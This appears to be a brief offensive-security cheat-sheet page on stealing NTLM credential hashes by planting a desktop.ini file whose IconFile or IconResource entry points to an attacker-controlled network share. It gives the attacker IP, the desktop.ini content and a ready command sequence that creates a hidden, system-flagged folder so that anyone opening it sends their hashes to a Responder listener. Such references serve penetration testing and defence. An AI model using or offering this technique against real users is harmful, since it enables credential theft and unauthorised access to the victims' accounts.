.. / NTLM-stealing_creds-desktop
Star

The desktop.ini files contain the information of the icons you have applied to the folder. We can abuse this to resolve a network path. Once you open the folder you should get the hashes. Make sure you have Responder running on the attacker IP address.

Command Reference:

Attacker IP: 10.10.14.4

Command:

[.ShellClassInfo]
IconFile=\\10.10.14.4\maus

Extra code:

mkdir openMe
attrib +s openMe
cd openMe
echo [.ShellClassInfo] > desktop.ini
echo IconResource=\\192.168.0.1\aa >> desktop.ini
attrib +s +h desktop.ini

References:

https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds#desktop.ini

.. / NTLM-stealing_creds-desktop Star if(localStorage["style"]=="true"){ document.getElementById('pagestyle').setAttribute('href','/assets/styleDark.css'); document.querySelector('input[type="checkbox"]').checked = true }

.. / NTLM-stealing_creds-desktop
Star